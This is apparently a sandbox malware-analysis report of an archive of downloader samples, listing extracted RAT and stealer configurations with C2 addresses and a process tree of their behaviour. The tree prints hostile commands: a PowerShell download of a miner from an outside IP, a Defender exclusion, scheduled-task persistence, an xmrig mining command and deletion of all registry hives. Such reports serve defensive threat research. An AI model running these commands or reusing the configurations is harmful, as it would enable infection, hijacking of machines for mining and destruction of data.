Resubmissions

31-12-2024 21:35

241231-1fmqnszqft 10

31-12-2024 21:27

241231-1axzfssnek 10

16-12-2024 05:27

241216-f5kx6awmh1 10

14-12-2024 20:23

241214-y6jqlasrhy 10

14-12-2024 20:22

241214-y51bysvmbk 10

14-12-2024 20:13

241214-yzc98svkfr 10

14-12-2024 13:14

241214-qgw1masrcy 10

14-12-2024 13:12

241214-qfk7qsvlaq 3

12-12-2024 18:19

241212-wymq6ssnat 10

Analysis

  • max time kernel
    232s
  • max time network
    281s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    31-12-2024 21:27

General

  • Target

    241127-xqsswsslej_pw_infected.zip

  • Size

    12KB

  • MD5

    79fd058f7d06cc022de1786507eb26e3

  • SHA1

    86590ec8ed73fd2951587561dff5387e9e0e18e6

  • SHA256

    cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

  • SHA512

    8316ac3782c05a3ebea4ca0868e33512e5ef29b251498f3af5ab261cd2010dec6b0eca8a57adcadb0d70653be2e22c0c2c137c7a38ec7b3d5ebbdd02e09c0227

  • SSDEEP

    384:sBfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWT:wfACW6Dr8HWTHWT

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

192.168.100.18:4782

Mutex

2cbe985c-9a4f-4f1f-a761-cd05d5feff4b

Attributes
  • encryption_key

    9493303F9F1D303190787B3D987F2DCB2BAF3CFD

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

remcos

Botnet

RemoteHost

C2

192.210.150.26:8787

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-R1T905

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

rhadamanthys

C2

https://185.196.11.237:9697/f002171ab05c7/9xqdctgg.ir1fr

Extracted

Family

quasar

Version

1.4.1

Botnet

Helper Atanka

C2

193.203.238.136:8080

Mutex

14f39659-ca5b-4af7-8045-bed3500c385f

Attributes
  • encryption_key

    11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424

  • install_name

    diskutil.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    diskutil

  • subdirectory

    diskutil

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

6.tcp.eu.ngrok.io:12925

Mutex

hDtjdONRXVCh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

stealc

Botnet

QQtalk

C2

http://154.216.17.90

Attributes
  • url_path

    /a48146f6763ef3af.php

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Detect Vidar Stealer 3 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Rhadamanthys family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • XMRig Miner payload 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 2 IoCs
  • DCRat payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops startup file 2 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 31 IoCs
  • Modifies system executable filetype association 2 TTPs 34 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2904
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2020
      • C:\Windows\system32\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • Accesses Microsoft Outlook profiles
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • outlook_office_path
        • outlook_win_path
        PID:2676
        • C:\Program Files\Windows Media Player\wmplayer.exe
          "C:\Program Files\Windows Media Player\wmplayer.exe"
          3⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          PID:2176
        • C:\Program Files\Windows Media Player\wmpnscfg.exe
          "C:\Program Files\Windows Media Player\wmpnscfg.exe"
          3⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          PID:1920
        • C:\Windows\SysWow64\rekeywiz.exe
          "C:\Windows\SysWow64\rekeywiz.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of UnmapMainImage
          PID:1116
        • C:\Program Files\Windows Media Player\wmplayer.exe
          "C:\Program Files\Windows Media Player\wmplayer.exe"
          3⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          PID:212
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
      1⤵
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4884
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:4588
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\" -spe -an -ai#7zMap24112:140:7zEvent452
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3520
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\*\" -spe -an -ai#7zMap29970:384:7zEvent25531
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:5072
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
        1⤵
          PID:1880
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
          1⤵
            PID:1624
          • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
            "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"
            1⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4884
            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\client.exe
              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\client.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:732
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4640
              • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:432
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                  4⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4840
            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\factura.exe
              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\factura.exe"
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3592
              • C:\Users\Admin\AppData\Local\Sancerre\nonhazardousness.exe
                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\factura.exe"
                3⤵
                • Drops startup file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of SetWindowsHookEx
                PID:3116
            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mrdgasdthawed.exe
              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mrdgasdthawed.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2092
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VfkWMUeJZl.bat"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4524
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  4⤵
                    PID:1928
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    4⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:2620
                  • C:\Users\Admin\AppData\Local\staticfile.exe
                    "C:\Users\Admin\AppData\Local\staticfile.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1016
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\j5cqYlxHIW.bat"
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3532
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        6⤵
                          PID:2400
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          6⤵
                            PID:3888
                          • C:\Users\Admin\AppData\Local\staticfile.exe
                            "C:\Users\Admin\AppData\Local\staticfile.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3900
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fVfPD2qQtb.bat"
                              7⤵
                                PID:2372
                                • C:\Windows\system32\chcp.com
                                  chcp 65001
                                  8⤵
                                    PID:3572
                                  • C:\Windows\system32\w32tm.exe
                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    8⤵
                                      PID:4664
                                    • C:\Users\Admin\AppData\Local\staticfile.exe
                                      "C:\Users\Admin\AppData\Local\staticfile.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3944
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hPr2ldZzRL.bat"
                                        9⤵
                                          PID:1988
                                          • C:\Windows\system32\chcp.com
                                            chcp 65001
                                            10⤵
                                              PID:2484
                                            • C:\Windows\system32\w32tm.exe
                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                              10⤵
                                                PID:2448
                                              • C:\Users\Admin\AppData\Local\staticfile.exe
                                                "C:\Users\Admin\AppData\Local\staticfile.exe"
                                                10⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4660
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fVfPD2qQtb.bat"
                                                  11⤵
                                                    PID:2484
                                                    • C:\Windows\system32\chcp.com
                                                      chcp 65001
                                                      12⤵
                                                        PID:4428
                                                      • C:\Windows\system32\w32tm.exe
                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        12⤵
                                                          PID:2644
                                                        • C:\Users\Admin\AppData\Local\staticfile.exe
                                                          "C:\Users\Admin\AppData\Local\staticfile.exe"
                                                          12⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4324
                                                          • C:\Users\Admin\AppData\Local\staticfile.exe
                                                            "C:\Users\Admin\AppData\Local\staticfile.exe"
                                                            13⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2332
                                    • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\DK.exe
                                      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\DK.exe"
                                      2⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of SetWindowsHookEx
                                      • Suspicious use of WriteProcessMemory
                                      PID:4840
                                    • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\update.exe
                                      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\update.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2784
                                    • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\leetspoofer.exe
                                      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\leetspoofer.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:2380
                                    • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\hell9o.exe
                                      "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\hell9o.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of SetWindowsHookEx
                                      PID:560
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\regdel.CMD
                                        3⤵
                                          PID:2380
                                          • C:\Windows\system32\reg.exe
                                            reg DELETE HKEY_CLASSES_ROOT /f
                                            4⤵
                                            • Modifies system executable filetype association
                                            • Modifies registry class
                                            PID:4780
                                          • C:\Windows\system32\reg.exe
                                            reg DELETE HKEY_CURRENT_USER /f
                                            4⤵
                                              PID:3700
                                            • C:\Windows\system32\reg.exe
                                              reg DELETE HKEY_LOCAL_MACHINE /f
                                              4⤵
                                                PID:3244
                                              • C:\Windows\system32\reg.exe
                                                reg DELETE HKEY_USERS /f
                                                4⤵
                                                  PID:5696
                                                • C:\Windows\system32\reg.exe
                                                  reg DELETE HKEY_CURRENT_CONFIG /f
                                                  4⤵
                                                    PID:5728
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\kisloyat.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\kisloyat.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3980
                                            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe
                                              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:3448
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xmrig.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xmrig.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:3764
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of WriteProcessMemory
                                                PID:4044
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4700
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4464
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:852
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
                                                    4⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4480
                                                • C:\WinXRAR\xmrig.exe
                                                  C:\WinXRAR\xmrig.exe -o xmr-us-east1.nanopool.org:14444 -u 47n193Tag3FHULdsD1HYmYGPdfCpquhdci1Rq2L4gR4U5Diq8oX6ny73xRqb4DwWYBTuQQF3Xa36AQFNjCCX71nAMeYiG4t -p x --algo rx/0
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4500
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2624
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2416
                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                  "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
                                                  3⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:1000
                                                • C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe
                                                  "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:1888
                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                    "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
                                                    4⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2040
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\systempreter.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\systempreter.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4004
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                PID:4700
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\RIMOH4WLXBIM" & exit
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1132
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 10
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Delays execution with timeout.exe
                                                    PID:3224
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                PID:4756
                                                • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe
                                                  "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: MapViewOfSection
                                                  PID:3344
                                                  • C:\Windows\explorer.exe
                                                    "C:\Windows\explorer.exe"
                                                    4⤵
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:656
                                                    • C:\Windows\EXPLORER.EXE
                                                      C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C}
                                                      5⤵
                                                        PID:2756
                                              • C:\Windows\system32\taskmgr.exe
                                                "C:\Windows\system32\taskmgr.exe" /0
                                                1⤵
                                                • Drops startup file
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:4304
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • System Location Discovery: System Language Discovery
                                                PID:3848
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:2068
                                              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe
                                                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3912
                                              • C:\Windows\System32\smss.exe
                                                \SystemRoot\System32\smss.exe 0000017c 0000008c
                                                1⤵
                                                  PID:656
                                                • C:\Windows\System32\smss.exe
                                                  \SystemRoot\System32\smss.exe 000000a4 0000008c
                                                  1⤵
                                                    PID:2332
                                                  • C:\Windows\System32\smss.exe
                                                    \SystemRoot\System32\smss.exe 0000014c 0000008c
                                                    1⤵
                                                      PID:2756

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\ProgramData\remcos\logs.dat

                                                      Filesize

                                                      924B

                                                      MD5

                                                      63aba3d3a32b1a52add2bcc2a80eddb0

                                                      SHA1

                                                      11d5d4726fa03916ba4be2b5f06b42f8a8080f47

                                                      SHA256

                                                      3ef32241be9cc70d1fc3ae06e6183abe73afa8950fdcaaaa0732789ee13befa2

                                                      SHA512

                                                      6fc9d456a8ff47bdb06d1de2bb5d9adde0ef4f1ff11d9d74f294200d7d8d8155b4e43f74342aca8edb3c5499baacb2c59415105dd3634cf16c0674d67aa71cf3

